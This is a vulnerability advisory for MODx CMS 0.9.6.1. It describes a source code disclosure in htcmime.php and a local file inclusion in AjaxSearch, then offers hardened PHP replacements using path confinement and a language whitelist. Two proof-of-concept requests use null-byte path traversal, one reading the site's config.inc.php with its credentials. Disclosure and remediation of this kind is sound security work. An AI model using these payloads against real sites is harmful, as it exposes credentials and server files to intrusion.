MODx CMS Source code disclosure, local file inclusion
########################## WwW.BugReport.ir #########################
#
# AmnPardaz Security Research Team
#
# Title: MODx CMS Vulnerabilities
# Vendor: http://modxcms.com
# Bugs: Source code disclosure, local file inclusion
# Vulnerable Version: 0.9.6.1 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix Available: No!
################################################################
####################
- Description:
####################
Quote from vendor: "MODx is an open source PHP Application Framework
that helps you take control of your online content.
It empowers developers and advanced users to give as much control as
desired to whomever they desire for day-to-day website content
maintenance chores."
####################
- Vulnerability:
####################
+--> source code disclosure
Code Snippet:
/assets/js/htcmime.php Line#18-36
$fname = (array_key_exists("file", $_GET)) ? $_GET["file"] : "";
// basename() also strips \x00, we don't need to worry about ? and # in path:
// Must be real files anyway, fopen() does not support wildcards
$ext = array_pop(explode('.', basename($fname)));
if (strcasecmp($ext, "htc") != 0 || !file_exists($fname))
    exit ("No file specified, file not found or illegal file.");
$flen = filesize($fname);
header("Content-type: text/x-component");
header("Content-Length: ".$flen);
header("Content-Disposition: inline; filename=$fname");
$fp = fopen($fname, "r");
echo fread($fp, $flen);
fclose($fp);
As the developer's own comment acknowledges, \x00 handling is the concern here: when magic_quotes_gpc is disabled, it is possible to bypass the extension check via null-character injection (because of the null-terminating behaviour of any function that uses fopen_wrappers), which could result in source code disclosure!
POC:
http://localhost/modx-0.9.6.1/assets/js/htcmime.php?file=../../manager/includes/config.inc.php%00.htc
+--> Local file inclusion
Code Snippet:
/assets/snippets/AjaxSearch/AjaxSearch.php line#17-41
$stripHTML = $_POST['stripHTML'];
$stripSnip = $_POST['stripSnip'];
$stripSnippets = $_POST['stripSnippets'];
$useAllWords = $_POST['useAllWords'];
$searchStyle = $_POST['searchStyle'];
$minChars = $_POST['minChars'];
$maxResults = $_POST['maxResults'];
$showMoreResults = $_POST['showMoreResults'];
$moreResultsPage = $_POST['moreResultsPage'];
$as_language = $_POST['as_language'];
$extract = $_POST['extract'];
$docgrp = $_POST['docgrp'];
$highlightResult = $_POST['highlightResult'];
include_once MODX_BASE_PATH . 'assets/snippets/AjaxSearch/includes/AjaxSearch.inc.php';
include MODX_BASE_PATH . 'assets/snippets/AjaxSearch/includes/templates.inc.php';
#include default language file
include(MODX_BASE_PATH . "assets/snippets/AjaxSearch/lang/english.inc.php");
#include other language file if set.
if($as_language!="english" && $as_language != '') {
    if(file_exists(MODX_BASE_PATH . "assets/snippets/AjaxSearch/lang/".$as_language.".inc.php"))
        include MODX_BASE_PATH . "assets/snippets/AjaxSearch/lang/".$as_language.".inc.php";
}
There is no input validation here, so it is possible to set $as_language to an arbitrary path, which could result in local file inclusion!
POC:
Method=POST
Action=http://localhost/modx-0.9.6.1/index-ajax.php?
Name=as_language Value=../ajaxSearch_readme.txt%00
Name=q Value=assets/snippets/AjaxSearch/AjaxSearch.php
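Both bugs above share one root cause: a user-supplied string is used to build a filesystem path, and the only guard (an extension compare, a file_exists() call) runs on the raw string rather than on the file the OS will actually open. The following is an added example written for this advisory; it is not MODx code and not a vendor patch. It shows hardened replacements for both patterns: the htcmime.php file-serving logic and the AjaxSearch language include. The function names, the $htcDir/$langDir locations and the language whitelist are assumptions for illustration.

```php
<?php
// Added example, not MODx code. Directory names, function names and the
// language whitelist below are assumptions for illustration only.

// Resolve a user-supplied relative path and confine it to $baseDir.
// Returns the canonical absolute path, or null if it is unsafe/missing.
function resolve_within(string $baseDir, string $userPath): ?string {
    // Reject embedded NUL explicitly: old PHP truncated paths at \0 (the
    // basis of both PoCs); modern PHP errors on it. Either way, refuse it.
    if (strpos($userPath, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    // realpath() collapses "../" and returns false for non-existent files,
    // so we compare the file the OS will really open, not the raw input.
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $userPath);
    if ($base === false || $full === false) {
        return null;
    }
    // The resolved file must sit strictly below the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

// Hardened form of the htcmime.php pattern: only regular *.htc files below
// a fixed directory are served, and the extension is checked on the
// resolved path rather than on the attacker-controlled string.
function serve_htc(string $htcDir, string $requested): bool {
    $path = resolve_within($htcDir, $requested);
    if ($path === null
        || strcasecmp(pathinfo($path, PATHINFO_EXTENSION), 'htc') !== 0
        || !is_file($path)) {
        header('HTTP/1.1 404 Not Found');
        return false;
    }
    header('Content-Type: text/x-component');
    header('Content-Length: ' . filesize($path));
    // Only the basename goes back to the client: the original code echoed
    // the full user-supplied $fname into the response header.
    header('Content-Disposition: inline; filename="' . basename($path) . '"');
    readfile($path);
    return true;
}

// Hardened form of the AjaxSearch language include: never build an include
// path from request data at all. Map the request onto a fixed whitelist and
// fall back to the default language for anything else.
function include_language(string $langDir, string $requested): string {
    // Assumed list of language files shipped with the snippet.
    $allowed = ['english', 'french', 'german'];
    $lang = in_array($requested, $allowed, true) ? $requested : 'english';
    $file = $langDir . DIRECTORY_SEPARATOR . $lang . '.inc.php';
    if (is_file($file)) {
        include $file;
    }
    return $lang;   // the language actually selected, for logging/debugging
}

// Example wiring (assumed paths, mirroring the original entry points):
// serve_htc(__DIR__ . '/assets/js', $_GET['file'] ?? '');
// include_language(__DIR__ . '/assets/snippets/AjaxSearch/lang',
//                  $_POST['as_language'] ?? 'english');
```

Two design points are worth noting. First, the whitelist approach in include_language() is preferable to path confinement whenever the set of legitimate values is small and known, because it removes the path-building step entirely and no longer depends on the behaviour of file_exists() or include on odd input. Second, resolve_within() returns null rather than throwing, so the calling code decides how to respond; logging the rejected value (without executing it) gives a useful detection signal for both traversal and null-byte attempts against an application.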
####################
- Credit:
####################
Original Advisory:
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com